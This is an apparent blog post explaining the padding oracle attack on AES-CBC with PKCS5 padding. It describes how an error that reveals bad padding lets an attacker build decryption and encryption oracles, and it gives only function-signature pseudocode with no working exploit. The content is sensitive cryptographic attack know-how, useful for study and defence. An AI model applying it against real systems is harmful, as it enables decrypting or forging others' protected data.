What’s Padding Oracle
AES-CBC with PKCS5 padding is the most pervasive cryptographic primitive in symmetric key encryption. Most of the implementation of AES-CBC will return an error if someone modified the cipher text and results in padding error after decryption. This error return will actually become the padding oracle. In pseudo code it looks like this
bool PaddingOracle(ciphertext) // given any ciphertext return boolean indicating whether decryption will be successful (or padding is correct or not)
Hacker can base on the above information and construct a decryption oracle like this:
char * DecryptionOracle(ciphertext) // given any ciphertext return plaintext
Worse yet, due to the way AES-CBC works hacker can create an encryption oracle based on the decryption oracle that looks like this:
char *EncryptionOracle(plaintext) // give any plaintext return ciphertext
Basically by leaking the side channel information of whether padding is correct or not will allow hacker to encrypt and decryption any messages without knowing the key itself.
No comments:
Post a Comment